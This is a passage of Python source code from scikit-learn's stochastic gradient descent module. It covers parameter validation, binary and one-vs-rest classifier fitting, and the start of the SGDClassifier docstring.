Prettenhofer (main author)\r\n# Mathieu Blondel (partial_fit support)\r\n#\r\n# License: BSD 3 clause\r\n\"\"\"Classification and regression using Stochastic Gradient Descent (SGD).\"\"\"\r\n\r\nimport numpy as np\r\nimport warnings\r\n\r\nfrom abc import ABCMeta, abstractmethod\r\n\r\nfrom joblib import Parallel\r\n\r\nfrom ..base import clone, is_classifier\r\nfrom ._base import LinearClassifierMixin, SparseCoefMixin\r\nfrom ._base import make_dataset\r\nfrom ..base import BaseEstimator, RegressorMixin\r\nfrom ..utils import check_array, check_random_state, check_X_y\r\nfrom ..utils.extmath import safe_sparse_dot\r\nfrom ..utils.multiclass import _check_partial_fit_first_call\r\nfrom ..utils.validation import check_is_fitted, _check_sample_weight\r\nfrom ..utils.validation import _deprecate_positional_args\r\nfrom ..utils.fixes import delayed\r\nfrom ..exceptions import ConvergenceWarning\r\nfrom ..model_selection import StratifiedShuffleSplit, ShuffleSplit\r\n\r\nfrom ._sgd_fast import _plain_sgd\r\nfrom ..utils import compute_class_weight\r\nfrom ._sgd_fast import Hinge\r\nfrom ._sgd_fast import SquaredHinge\r\nfrom ._sgd_fast import Log\r\nfrom ._sgd_fast import ModifiedHuber\r\nfrom ._sgd_fast import SquaredLoss\r\nfrom ._sgd_fast import Huber\r\nfrom ._sgd_fast import EpsilonInsensitive\r\nfrom ._sgd_fast import SquaredEpsilonInsensitive\r\nfrom ..utils.fixes import _joblib_parallel_args\r\nfrom ..utils import deprecated\r\n\r\nLEARNING_RATE_TYPES = {\"constant\": 1, \"optimal\": 2, \"invscaling\": 3,\r\n \"adaptive\": 4, \"pa1\": 5, \"pa2\": 6}\r\n\r\nPENALTY_TYPES = {\"none\": 0, \"l2\": 2, \"l1\": 1, \"elasticnet\": 3}\r\n\r\nDEFAULT_EPSILON = 0.1\r\n# Default value of ``epsilon`` parameter.\r\n\r\nMAX_INT = np.iinfo(np.int32).max\r\n\r\n\r\nclass _ValidationScoreCallback:\r\n \"\"\"Callback for early stopping based on validation score\"\"\"\r\n\r\n def __init__(self, estimator, X_val, y_val, sample_weight_val,\r\n classes=None):\r\n self.estimator = clone(estimator)\r\n self.estimator.t_ = 1 # to pass check_is_fitted\r\n if classes is not None:\r\n self.estimator.classes_ = classes\r\n self.X_val = X_val\r\n self.y_val = y_val\r\n self.sample_weight_val = sample_weight_val\r\n\r\n def __call__(self, coef, intercept):\r\n est = self.estimator\r\n est.coef_ = coef.reshape(1, -1)\r\n est.intercept_ = np.atleast_1d(intercept)\r\n return est.score(self.X_val, self.y_val, self.sample_weight_val)\r\n\r\n\r\nclass BaseSGD(SparseCoefMixin, BaseEstimator, metaclass=ABCMeta):\r\n \"\"\"Base class for SGD classification and regression.\"\"\"\r\n @_deprecate_positional_args\r\n def __init__(self, loss, *, penalty='l2', alpha=0.0001, C=1.0,\r\n l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,\r\n shuffle=True, verbose=0, epsilon=0.1, random_state=None,\r\n learning_rate=\"optimal\", eta0=0.0, power_t=0.5,\r\n early_stopping=False, validation_fraction=0.1,\r\n n_iter_no_change=5, warm_start=False, average=False):\r\n self.loss = loss\r\n self.penalty = penalty\r\n self.learning_rate = learning_rate\r\n self.epsilon = epsilon\r\n self.alpha = alpha\r\n self.C = C\r\n self.l1_ratio = l1_ratio\r\n self.fit_intercept = fit_intercept\r\n self.shuffle = shuffle\r\n self.random_state = random_state\r\n self.verbose = verbose\r\n self.eta0 = eta0\r\n self.power_t = power_t\r\n self.early_stopping = early_stopping\r\n self.validation_fraction = validation_fraction\r\n self.n_iter_no_change = n_iter_no_change\r\n self.warm_start = warm_start\r\n self.average = average\r\n self.max_iter = max_iter\r\n self.tol = tol\r\n # current tests expect init to do parameter validation\r\n # but we are not allowed to set attributes\r\n self._validate_params()\r\n\r\n def set_params(self, **kwargs):\r\n \"\"\"Set and validate the parameters of estimator.\r\n\r\n Parameters\r\n ----------\r\n **kwargs : dict\r\n Estimator parameters.\r\n\r\n Returns\r\n -------\r\n self : object\r\n Estimator instance.\r\n \"\"\"\r\n super().set_params(**kwargs)\r\n self._validate_params()\r\n return self\r\n\r\n @abstractmethod\r\n def fit(self, X, y):\r\n \"\"\"Fit model.\"\"\"\r\n\r\n def _validate_params(self, for_partial_fit=False):\r\n \"\"\"Validate input params. \"\"\"\r\n if not isinstance(self.shuffle, bool):\r\n raise ValueError(\"shuffle must be either True or False\")\r\n if not isinstance(self.early_stopping, bool):\r\n raise ValueError(\"early_stopping must be either True or False\")\r\n if self.early_stopping and for_partial_fit:\r\n raise ValueError(\"early_stopping should be False with partial_fit\")\r\n if self.max_iter is not None and self.max_iter <= 0:\r\n raise ValueError(\"max_iter must be > zero. Got %f\" % self.max_iter)\r\n if not (0.0 <= self.l1_ratio <= 1.0):\r\n raise ValueError(\"l1_ratio must be in [0, 1]\")\r\n if self.alpha < 0.0:\r\n raise ValueError(\"alpha must be >= 0\")\r\n if self.n_iter_no_change < 1:\r\n raise ValueError(\"n_iter_no_change must be >= 1\")\r\n if not (0.0 < self.validation_fraction < 1.0):\r\n raise ValueError(\"validation_fraction must be in range (0, 1)\")\r\n if self.learning_rate in (\"constant\", \"invscaling\", \"adaptive\"):\r\n if self.eta0 <= 0.0:\r\n raise ValueError(\"eta0 must be > 0\")\r\n if self.learning_rate == \"optimal\" and self.alpha == 0:\r\n raise ValueError(\"alpha must be > 0 since \"\r\n \"learning_rate is 'optimal'. alpha is used \"\r\n \"to compute the optimal learning rate.\")\r\n\r\n # raises ValueError if not registered\r\n self._get_penalty_type(self.penalty)\r\n self._get_learning_rate_type(self.learning_rate)\r\n\r\n if self.loss not in self.loss_functions:\r\n raise ValueError(\"The loss %s is not supported. \" % self.loss)\r\n\r\n def _get_loss_function(self, loss):\r\n \"\"\"Get concrete ``LossFunction`` object for str ``loss``. \"\"\"\r\n try:\r\n loss_ = self.loss_functions[loss]\r\n loss_class, args = loss_[0], loss_[1:]\r\n if loss in ('huber', 'epsilon_insensitive',\r\n 'squared_epsilon_insensitive'):\r\n args = (self.epsilon, )\r\n return loss_class(*args)\r\n except KeyError as e:\r\n raise ValueError(\"The loss %s is not supported. \" % loss) from e\r\n\r\n def _get_learning_rate_type(self, learning_rate):\r\n try:\r\n return LEARNING_RATE_TYPES[learning_rate]\r\n except KeyError as e:\r\n raise ValueError(\"learning rate %s \"\r\n \"is not supported. \" % learning_rate) from e\r\n\r\n def _get_penalty_type(self, penalty):\r\n penalty = str(penalty).lower()\r\n try:\r\n return PENALTY_TYPES[penalty]\r\n except KeyError as e:\r\n raise ValueError(\"Penalty %s is not supported. \" % penalty) from e\r\n\r\n def _allocate_parameter_mem(self, n_classes, n_features, coef_init=None,\r\n intercept_init=None):\r\n \"\"\"Allocate mem for parameters; initialize if provided.\"\"\"\r\n if n_classes > 2:\r\n # allocate coef_ for multi-class\r\n if coef_init is not None:\r\n coef_init = np.asarray(coef_init, order=\"C\")\r\n if coef_init.shape != (n_classes, n_features):\r\n raise ValueError(\"Provided ``coef_`` does not match \"\r\n \"dataset. \")\r\n self.coef_ = coef_init\r\n else:\r\n self.coef_ = np.zeros((n_classes, n_features),\r\n dtype=np.float64, order=\"C\")\r\n\r\n # allocate intercept_ for multi-class\r\n if intercept_init is not None:\r\n intercept_init = np.asarray(intercept_init, order=\"C\")\r\n if intercept_init.shape != (n_classes, ):\r\n raise ValueError(\"Provided intercept_init \"\r\n \"does not match dataset.\")\r\n self.intercept_ = intercept_init\r\n else:\r\n self.intercept_ = np.zeros(n_classes, dtype=np.float64,\r\n order=\"C\")\r\n else:\r\n # allocate coef_ for binary problem\r\n if coef_init is not None:\r\n coef_init = np.asarray(coef_init, dtype=np.float64,\r\n order=\"C\")\r\n coef_init = coef_init.ravel()\r\n if coef_init.shape != (n_features,):\r\n raise ValueError(\"Provided coef_init does not \"\r\n \"match dataset.\")\r\n self.coef_ = coef_init\r\n else:\r\n self.coef_ = np.zeros(n_features,\r\n dtype=np.float64,\r\n order=\"C\")\r\n\r\n # allocate intercept_ for binary problem\r\n if intercept_init is not None:\r\n intercept_init = np.asarray(intercept_init, dtype=np.float64)\r\n if intercept_init.shape != (1,) and intercept_init.shape != ():\r\n raise ValueError(\"Provided intercept_init \"\r\n \"does not match dataset.\")\r\n self.intercept_ = intercept_init.reshape(1,)\r\n else:\r\n self.intercept_ = np.zeros(1, dtype=np.float64, order=\"C\")\r\n\r\n # initialize average parameters\r\n if self.average > 0:\r\n self._standard_coef = self.coef_\r\n self._standard_intercept = self.intercept_\r\n self._average_coef = np.zeros(self.coef_.shape,\r\n dtype=np.float64,\r\n order=\"C\")\r\n self._average_intercept = np.zeros(self._standard_intercept.shape,\r\n dtype=np.float64,\r\n order=\"C\")\r\n\r\n def _make_validation_split(self, y):\r\n \"\"\"Split the dataset between training set and validation set.\r\n\r\n Parameters\r\n ----------\r\n y : ndarray of shape (n_samples, )\r\n Target values.\r\n\r\n Returns\r\n -------\r\n validation_mask : ndarray of shape (n_samples, )\r\n Equal to 1 on the validation set, 0 on the training set.\r\n \"\"\"\r\n n_samples = y.shape[0]\r\n validation_mask = np.zeros(n_samples, dtype=np.uint8)\r\n if not self.early_stopping:\r\n # use the full set for training, with an empty validation set\r\n return validation_mask\r\n\r\n if is_classifier(self):\r\n splitter_type = StratifiedShuffleSplit\r\n else:\r\n splitter_type = ShuffleSplit\r\n cv = splitter_type(test_size=self.validation_fraction,\r\n random_state=self.random_state)\r\n idx_train, idx_val = next(cv.split(np.zeros(shape=(y.shape[0], 1)), y))\r\n if idx_train.shape[0] == 0 or idx_val.shape[0] == 0:\r\n raise ValueError(\r\n \"Splitting %d samples into a train set and a validation set \"\r\n \"with validation_fraction=%r led to an empty set (%d and %d \"\r\n \"samples). Please either change validation_fraction, increase \"\r\n \"number of samples, or disable early_stopping.\"\r\n % (n_samples, self.validation_fraction, idx_train.shape[0],\r\n idx_val.shape[0]))\r\n\r\n validation_mask[idx_val] = 1\r\n return validation_mask\r\n\r\n def _make_validation_score_cb(self, validation_mask, X, y, sample_weight,\r\n classes=None):\r\n if not self.early_stopping:\r\n return None\r\n\r\n return _ValidationScoreCallback(\r\n self, X[validation_mask], y[validation_mask],\r\n sample_weight[validation_mask], classes=classes)\r\n\r\n # mypy error: Decorated property not supported\r\n @deprecated(\"Attribute standard_coef_ was deprecated \" # type: ignore\r\n \"in version 0.23 and will be removed in 1.0 \"\r\n \"(renaming of 0.25).\")\r\n @property\r\n def standard_coef_(self):\r\n return self._standard_coef\r\n\r\n # mypy error: Decorated property not supported\r\n @deprecated( # type: ignore\r\n \"Attribute standard_intercept_ was deprecated \"\r\n \"in version 0.23 and will be removed in 1.0 (renaming of 0.25).\"\r\n )\r\n @property\r\n def standard_intercept_(self):\r\n return self._standard_intercept\r\n\r\n # mypy error: Decorated property not supported\r\n @deprecated(\"Attribute average_coef_ was deprecated \" # type: ignore\r\n \"in version 0.23 and will be removed in 1.0 \"\r\n \"(renaming of 0.25).\")\r\n @property\r\n def average_coef_(self):\r\n return self._average_coef\r\n\r\n # mypy error: Decorated property not supported\r\n @deprecated(\"Attribute average_intercept_ was deprecated \" # type: ignore\r\n \"in version 0.23 and will be removed in 1.0 \"\r\n \"(renaming of 0.25).\")\r\n @property\r\n def average_intercept_(self):\r\n return self._average_intercept\r\n\r\n\r\ndef _prepare_fit_binary(est, y, i):\r\n \"\"\"Initialization for fit_binary.\r\n\r\n Returns y, coef, intercept, average_coef, average_intercept.\r\n \"\"\"\r\n y_i = np.ones(y.shape, dtype=np.float64, order=\"C\")\r\n y_i[y != est.classes_[i]] = -1.0\r\n average_intercept = 0\r\n average_coef = None\r\n\r\n if len(est.classes_) == 2:\r\n if not est.average:\r\n coef = est.coef_.ravel()\r\n intercept = est.intercept_[0]\r\n else:\r\n coef = est._standard_coef.ravel()\r\n intercept = est._standard_intercept[0]\r\n average_coef = est._average_coef.ravel()\r\n average_intercept = est._average_intercept[0]\r\n else:\r\n if not est.average:\r\n coef = est.coef_[i]\r\n intercept = est.intercept_[i]\r\n else:\r\n coef = est._standard_coef[i]\r\n intercept = est._standard_intercept[i]\r\n average_coef = est._average_coef[i]\r\n average_intercept = est._average_intercept[i]\r\n\r\n return y_i, coef, intercept, average_coef, average_intercept\r\n\r\n\r\ndef fit_binary(est, i, X, y, alpha, C, learning_rate, max_iter,\r\n pos_weight, neg_weight, sample_weight, validation_mask=None,\r\n random_state=None):\r\n \"\"\"Fit a single binary classifier.\r\n\r\n The i'th class is considered the \"positive\" class.\r\n\r\n Parameters\r\n ----------\r\n est : Estimator object\r\n The estimator to fit\r\n\r\n i : int\r\n Index of the positive class\r\n\r\n X : numpy array or sparse matrix of shape [n_samples,n_features]\r\n Training data\r\n\r\n y : numpy array of shape [n_samples, ]\r\n Target values\r\n\r\n alpha : float\r\n The regularization parameter\r\n\r\n C : float\r\n Maximum step size for passive aggressive\r\n\r\n learning_rate : string\r\n The learning rate. Accepted values are 'constant', 'optimal',\r\n 'invscaling', 'pa1' and 'pa2'.\r\n\r\n max_iter : int\r\n The maximum number of iterations (epochs)\r\n\r\n pos_weight : float\r\n The weight of the positive class\r\n\r\n neg_weight : float\r\n The weight of the negative class\r\n\r\n sample_weight : numpy array of shape [n_samples, ]\r\n The weight of each sample\r\n\r\n validation_mask : numpy array of shape [n_samples, ], default=None\r\n Precomputed validation mask in case _fit_binary is called in the\r\n context of a one-vs-rest reduction.\r\n\r\n random_state : int, RandomState instance, default=None\r\n If int, random_state is the seed used by the random number generator;\r\n If RandomState instance, random_state is the random number generator;\r\n If None, the random number generator is the RandomState instance used\r\n by `np.random`.\r\n \"\"\"\r\n # if average is not true, average_coef, and average_intercept will be\r\n # unused\r\n y_i, coef, intercept, average_coef, average_intercept = \\\r\n _prepare_fit_binary(est, y, i)\r\n assert y_i.shape[0] == y.shape[0] == sample_weight.shape[0]\r\n\r\n random_state = check_random_state(random_state)\r\n dataset, intercept_decay = make_dataset(\r\n X, y_i, sample_weight, random_state=random_state)\r\n\r\n penalty_type = est._get_penalty_type(est.penalty)\r\n learning_rate_type = est._get_learning_rate_type(learning_rate)\r\n\r\n if validation_mask is None:\r\n validation_mask = est._make_validation_split(y_i)\r\n classes = np.array([-1, 1], dtype=y_i.dtype)\r\n validation_score_cb = est._make_validation_score_cb(\r\n validation_mask, X, y_i, sample_weight, classes=classes)\r\n\r\n # numpy mtrand expects a C long which is a signed 32 bit integer under\r\n # Windows\r\n seed = random_state.randint(MAX_INT)\r\n\r\n tol = est.tol if est.tol is not None else -np.inf\r\n\r\n coef, intercept, average_coef, average_intercept, n_iter_ = _plain_sgd(\r\n coef, intercept, average_coef, average_intercept, est.loss_function_,\r\n penalty_type, alpha, C, est.l1_ratio, dataset, validation_mask,\r\n est.early_stopping, validation_score_cb, int(est.n_iter_no_change),\r\n max_iter, tol, int(est.fit_intercept), int(est.verbose),\r\n int(est.shuffle), seed, pos_weight, neg_weight, learning_rate_type,\r\n est.eta0, est.power_t, est.t_, intercept_decay, est.average)\r\n\r\n if est.average:\r\n if len(est.classes_) == 2:\r\n est._average_intercept[0] = average_intercept\r\n else:\r\n est._average_intercept[i] = average_intercept\r\n\r\n return coef, intercept, n_iter_\r\n\r\n\r\nclass BaseSGDClassifier(LinearClassifierMixin, BaseSGD, metaclass=ABCMeta):\r\n\r\n loss_functions = {\r\n \"hinge\": (Hinge, 1.0),\r\n \"squared_hinge\": (SquaredHinge, 1.0),\r\n \"perceptron\": (Hinge, 0.0),\r\n \"log\": (Log, ),\r\n \"modified_huber\": (ModifiedHuber, ),\r\n \"squared_loss\": (SquaredLoss, ),\r\n \"huber\": (Huber, DEFAULT_EPSILON),\r\n \"epsilon_insensitive\": (EpsilonInsensitive, DEFAULT_EPSILON),\r\n \"squared_epsilon_insensitive\": (SquaredEpsilonInsensitive,\r\n DEFAULT_EPSILON),\r\n }\r\n\r\n @abstractmethod\r\n @_deprecate_positional_args\r\n def __init__(self, loss=\"hinge\", *, penalty='l2', alpha=0.0001,\r\n l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,\r\n shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=None,\r\n random_state=None, learning_rate=\"optimal\", eta0=0.0,\r\n power_t=0.5, early_stopping=False,\r\n validation_fraction=0.1, n_iter_no_change=5,\r\n class_weight=None, warm_start=False, average=False):\r\n\r\n super().__init__(\r\n loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,\r\n fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,\r\n shuffle=shuffle, verbose=verbose, epsilon=epsilon,\r\n random_state=random_state, learning_rate=learning_rate, eta0=eta0,\r\n power_t=power_t, early_stopping=early_stopping,\r\n validation_fraction=validation_fraction,\r\n n_iter_no_change=n_iter_no_change, warm_start=warm_start,\r\n average=average)\r\n self.class_weight = class_weight\r\n self.n_jobs = n_jobs\r\n\r\n def _partial_fit(self, X, y, alpha, C,\r\n loss, learning_rate, max_iter,\r\n classes, sample_weight,\r\n coef_init, intercept_init):\r\n X, y = check_X_y(X, y, accept_sparse='csr', dtype=np.float64,\r\n order=\"C\", accept_large_sparse=False)\r\n\r\n n_samples, n_features = X.shape\r\n\r\n _check_partial_fit_first_call(self, classes)\r\n\r\n n_classes = self.classes_.shape[0]\r\n\r\n # Allocate datastructures from input arguments\r\n self._expanded_class_weight = compute_class_weight(\r\n self.class_weight, classes=self.classes_, y=y)\r\n sample_weight = _check_sample_weight(sample_weight, X)\r\n\r\n if getattr(self, \"coef_\", None) is None or coef_init is not None:\r\n self._allocate_parameter_mem(n_classes, n_features,\r\n coef_init, intercept_init)\r\n elif n_features != self.coef_.shape[-1]:\r\n raise ValueError(\"Number of features %d does not match previous \"\r\n \"data %d.\" % (n_features, self.coef_.shape[-1]))\r\n\r\n self.loss_function_ = self._get_loss_function(loss)\r\n if not hasattr(self, \"t_\"):\r\n self.t_ = 1.0\r\n\r\n # delegate to concrete training procedure\r\n if n_classes > 2:\r\n self._fit_multiclass(X, y, alpha=alpha, C=C,\r\n learning_rate=learning_rate,\r\n sample_weight=sample_weight,\r\n max_iter=max_iter)\r\n elif n_classes == 2:\r\n self._fit_binary(X, y, alpha=alpha, C=C,\r\n learning_rate=learning_rate,\r\n sample_weight=sample_weight,\r\n max_iter=max_iter)\r\n else:\r\n raise ValueError(\r\n \"The number of classes has to be greater than one;\"\r\n \" got %d class\" % n_classes)\r\n\r\n return self\r\n\r\n def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,\r\n intercept_init=None, sample_weight=None):\r\n self._validate_params()\r\n if hasattr(self, \"classes_\"):\r\n self.classes_ = None\r\n\r\n X, y = self._validate_data(X, y, accept_sparse='csr',\r\n dtype=np.float64, order=\"C\",\r\n accept_large_sparse=False)\r\n\r\n # labels can be encoded as float, int, or string literals\r\n # np.unique sorts in asc order; largest class id is positive class\r\n classes = np.unique(y)\r\n\r\n if self.warm_start and hasattr(self, \"coef_\"):\r\n if coef_init is None:\r\n coef_init = self.coef_\r\n if intercept_init is None:\r\n intercept_init = self.intercept_\r\n else:\r\n self.coef_ = None\r\n self.intercept_ = None\r\n\r\n if self.average > 0:\r\n self._standard_coef = self.coef_\r\n self._standard_intercept = self.intercept_\r\n self._average_coef = None\r\n self._average_intercept = None\r\n\r\n # Clear iteration count for multiple call to fit.\r\n self.t_ = 1.0\r\n\r\n self._partial_fit(X, y, alpha, C, loss, learning_rate, self.max_iter,\r\n classes, sample_weight, coef_init, intercept_init)\r\n\r\n if (self.tol is not None and self.tol > -np.inf\r\n and self.n_iter_ == self.max_iter):\r\n warnings.warn(\"Maximum number of iteration reached before \"\r\n \"convergence. Consider increasing max_iter to \"\r\n \"improve the fit.\",\r\n ConvergenceWarning)\r\n return self\r\n\r\n def _fit_binary(self, X, y, alpha, C, sample_weight,\r\n learning_rate, max_iter):\r\n \"\"\"Fit a binary classifier on X and y. \"\"\"\r\n coef, intercept, n_iter_ = fit_binary(self, 1, X, y, alpha, C,\r\n learning_rate, max_iter,\r\n self._expanded_class_weight[1],\r\n self._expanded_class_weight[0],\r\n sample_weight,\r\n random_state=self.random_state)\r\n\r\n self.t_ += n_iter_ * X.shape[0]\r\n self.n_iter_ = n_iter_\r\n\r\n # need to be 2d\r\n if self.average > 0:\r\n if self.average <= self.t_ - 1:\r\n self.coef_ = self._average_coef.reshape(1, -1)\r\n self.intercept_ = self._average_intercept\r\n else:\r\n self.coef_ = self._standard_coef.reshape(1, -1)\r\n self._standard_intercept = np.atleast_1d(intercept)\r\n self.intercept_ = self._standard_intercept\r\n else:\r\n self.coef_ = coef.reshape(1, -1)\r\n # intercept is a float, need to convert it to an array of length 1\r\n self.intercept_ = np.atleast_1d(intercept)\r\n\r\n def _fit_multiclass(self, X, y, alpha, C, learning_rate,\r\n sample_weight, max_iter):\r\n \"\"\"Fit a multi-class classifier by combining binary classifiers\r\n\r\n Each binary classifier predicts one class versus all others. This\r\n strategy is called OvA (One versus All) or OvR (One versus Rest).\r\n \"\"\"\r\n # Precompute the validation split using the multiclass labels\r\n # to ensure proper balancing of the classes.\r\n validation_mask = self._make_validation_split(y)\r\n\r\n # Use joblib to fit OvA in parallel.\r\n # Pick the random seed for each job outside of fit_binary to avoid\r\n # sharing the estimator random state between threads which could lead\r\n # to non-deterministic behavior\r\n random_state = check_random_state(self.random_state)\r\n seeds = random_state.randint(MAX_INT, size=len(self.classes_))\r\n result = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,\r\n **_joblib_parallel_args(require=\"sharedmem\"))(\r\n delayed(fit_binary)(self, i, X, y, alpha, C, learning_rate,\r\n max_iter, self._expanded_class_weight[i],\r\n 1., sample_weight,\r\n validation_mask=validation_mask,\r\n random_state=seed)\r\n for i, seed in enumerate(seeds))\r\n\r\n # take the maximum of n_iter_ over every binary fit\r\n n_iter_ = 0.\r\n for i, (_, intercept, n_iter_i) in enumerate(result):\r\n self.intercept_[i] = intercept\r\n n_iter_ = max(n_iter_, n_iter_i)\r\n\r\n self.t_ += n_iter_ * X.shape[0]\r\n self.n_iter_ = n_iter_\r\n\r\n if self.average > 0:\r\n if self.average <= self.t_ - 1.0:\r\n self.coef_ = self._average_coef\r\n self.intercept_ = self._average_intercept\r\n else:\r\n self.coef_ = self._standard_coef\r\n self._standard_intercept = np.atleast_1d(self.intercept_)\r\n self.intercept_ = self._standard_intercept\r\n\r\n def partial_fit(self, X, y, classes=None, sample_weight=None):\r\n \"\"\"Perform one epoch of stochastic gradient descent on given samples.\r\n\r\n Internally, this method uses ``max_iter = 1``. Therefore, it is not\r\n guaranteed that a minimum of the cost function is reached after calling\r\n it once. Matters such as objective convergence and early stopping\r\n should be handled by the user.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Subset of the training data.\r\n\r\n y : ndarray of shape (n_samples,)\r\n Subset of the target values.\r\n\r\n classes : ndarray of shape (n_classes,), default=None\r\n Classes across all calls to partial_fit.\r\n Can be obtained by via `np.unique(y_all)`, where y_all is the\r\n target vector of the entire dataset.\r\n This argument is required for the first call to partial_fit\r\n and can be omitted in the subsequent calls.\r\n Note that y doesn't need to contain all labels in `classes`.\r\n\r\n sample_weight : array-like, shape (n_samples,), default=None\r\n Weights applied to individual samples.\r\n If not provided, uniform weights are assumed.\r\n\r\n Returns\r\n -------\r\n self :\r\n Returns an instance of self.\r\n \"\"\"\r\n self._validate_params(for_partial_fit=True)\r\n if self.class_weight in ['balanced']:\r\n raise ValueError(\"class_weight '{0}' is not supported for \"\r\n \"partial_fit. In order to use 'balanced' weights,\"\r\n \" use compute_class_weight('{0}', \"\r\n \"classes=classes, y=y). \"\r\n \"In place of y you can us a large enough sample \"\r\n \"of the full training set target to properly \"\r\n \"estimate the class frequency distributions. \"\r\n \"Pass the resulting weights as the class_weight \"\r\n \"parameter.\".format(self.class_weight))\r\n return self._partial_fit(X, y, alpha=self.alpha, C=1.0, loss=self.loss,\r\n learning_rate=self.learning_rate, max_iter=1,\r\n classes=classes, sample_weight=sample_weight,\r\n coef_init=None, intercept_init=None)\r\n\r\n def fit(self, X, y, coef_init=None, intercept_init=None,\r\n sample_weight=None):\r\n \"\"\"Fit linear model with Stochastic Gradient Descent.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Training data.\r\n\r\n y : ndarray of shape (n_samples,)\r\n Target values.\r\n\r\n coef_init : ndarray of shape (n_classes, n_features), default=None\r\n The initial coefficients to warm-start the optimization.\r\n\r\n intercept_init : ndarray of shape (n_classes,), default=None\r\n The initial intercept to warm-start the optimization.\r\n\r\n sample_weight : array-like, shape (n_samples,), default=None\r\n Weights applied to individual samples.\r\n If not provided, uniform weights are assumed. These weights will\r\n be multiplied with class_weight (passed through the\r\n constructor) if class_weight is specified.\r\n\r\n Returns\r\n -------\r\n self :\r\n Returns an instance of self.\r\n \"\"\"\r\n return self._fit(X, y, alpha=self.alpha, C=1.0,\r\n loss=self.loss, learning_rate=self.learning_rate,\r\n coef_init=coef_init, intercept_init=intercept_init,\r\n sample_weight=sample_weight)\r\n\r\n\r\nclass SGDClassifier(BaseSGDClassifier):\r\n \"\"\"Linear classifiers (SVM, logistic regression, etc.) with SGD training.\r\n\r\n This estimator implements regularized linear models with stochastic\r\n gradient descent (SGD) learning: the gradient of the loss is estimated\r\n each sample at a time and the model is updated along the way with a\r\n decreasing strength schedule (aka learning rate). SGD allows minibatch\r\n (online/out-of-core) learning via the `partial_fit` method.\r\n For best results using the default learning rate schedule, the data should\r\n have zero mean and unit variance.\r\n\r\n This implementation works with data represented as dense or sparse arrays\r\n of floating point values for the features. The model it fits can be\r\n controlled with the loss parameter; by default, it fits a linear support\r\n vector machine (SVM).\r\n\r\n The regularizer is a penalty added to the loss function that shrinks model\r\n parameters towards the zero vector using either the squared euclidean norm\r\n L2 or the absolute norm L1 or a combination of both (Elastic Net). If the\r\n parameter update crosses the 0.0 value because of the regularizer, the\r\n update is truncated to 0.0 to allow for learning sparse models and achieve\r\n online feature selection.\r\n\r\n Read more in the :ref:`User Guide `.\r\n\r\n Parameters\r\n ----------\r\n loss : str, default='hinge'\r\n The loss function to be used. Defaults to 'hinge', which gives a\r\n linear SVM.\r\n\r\n The possible options are 'hinge', 'log', 'modified_huber',\r\n 'squared_hinge', 'perceptron', or a regression loss: 'squared_loss',\r\n 'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.\r\n\r\n The 'log' loss gives logistic regression, a probabilistic classifier.\r\n 'modified_huber' is another smooth loss that brings tolerance to\r\n outliers as well as probability estimates.\r\n 'squared_hinge' is like hinge but is quadratically penalized.\r\n 'perceptron' is the linear loss used by the perceptron algorithm.\r\n The other losses are designed for regression but can be useful in\r\n classification as well; see\r\n :class:`~sklearn.linear_model.SGDRegressor` for a description.\r\n\r\n More details about the losses formulas can be found in the\r\n :ref:`User Guide `.\r\n\r\n penalty : {'l2', 'l1', 'elasticnet'}, default='l2'\r\n The penalty (aka regularization term) to be used. Defaults to 'l2'\r\n which is the standard regularizer for linear SVM models. 'l1' and\r\n 'elasticnet' might bring sparsity to the model (feature selection)\r\n not achievable with 'l2'.\r\n\r\n alpha : float, default=0.0001\r\n Constant that multiplies the regularization term. The higher the\r\n value, the stronger the regularization.\r\n Also used to compute the learning rate when set to `learning_rate` is\r\n set to 'optimal'.\r\n\r\n l1_ratio : float, default=0.15\r\n The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.\r\n l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.\r\n Only used if `penalty` is 'elasticnet'.\r\n\r\n fit_intercept : bool, default=True\r\n Whether the intercept should be estimated or not. If False, the\r\n data is assumed to be already centered.\r\n\r\n max_iter : int, default=1000\r\n The maximum number of passes over the training data (aka epochs).\r\n It only impacts the behavior in the ``fit`` method, and not the\r\n :meth:`partial_fit` method.\r\n\r\n .. versionadded:: 0.19\r\n\r\n tol : float, default=1e-3\r\n The stopping criterion. If it is not None, training will stop\r\n when (loss > best_loss - tol) for ``n_iter_no_change`` consecutive\r\n epochs.\r\n\r\n .. versionadded:: 0.19\r\n\r\n shuffle : bool, default=True\r\n Whether or not the training data should be shuffled after each epoch.\r\n\r\n verbose : int, default=0\r\n The verbosity level.\r\n\r\n epsilon : float, default=0.1\r\n Epsilon in the epsilon-insensitive loss functions; only if `loss` is\r\n 'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.\r\n For 'huber', determines the threshold at which it becomes less\r\n important to get the prediction exactly right.\r\n For epsilon-insensitive, any differences between the current prediction\r\n and the correct label are ignored if they are less than this threshold.\r\n\r\n n_jobs : int, default=None\r\n The number of CPUs to use to do the OVA (One Versus All, for\r\n multi-class problems) computation.\r\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\r\n ``-1`` means using all processors. See :term:`Glossary `\r\n for more details.\r\n\r\n random_state : int, RandomState instance, default=None\r\n Used for shuffling the data, when ``shuffle`` is set to ``True``.\r\n Pass an int for reproducible output across multiple function calls.\r\n See :term:`Glossary `.\r\n\r\n learning_rate : str, default='optimal'\r\n The learning rate schedule:\r\n\r\n - 'constant': `eta = eta0`\r\n - 'optimal': `eta = 1.0 / (alpha * (t + t0))`\r\n where t0 is chosen by a heuristic proposed by Leon Bottou.\r\n - 'invscaling': `eta = eta0 / pow(t, power_t)`\r\n - 'adaptive': eta = eta0, as long as the training keeps decreasing.\r\n Each time n_iter_no_change consecutive epochs fail to decrease the\r\n training loss by tol or fail to increase validation score by tol if\r\n early_stopping is True, the current learning rate is divided by 5.\r\n\r\n .. versionadded:: 0.20\r\n Added 'adaptive' option\r\n\r\n eta0 : double, default=0.0\r\n The initial learning rate 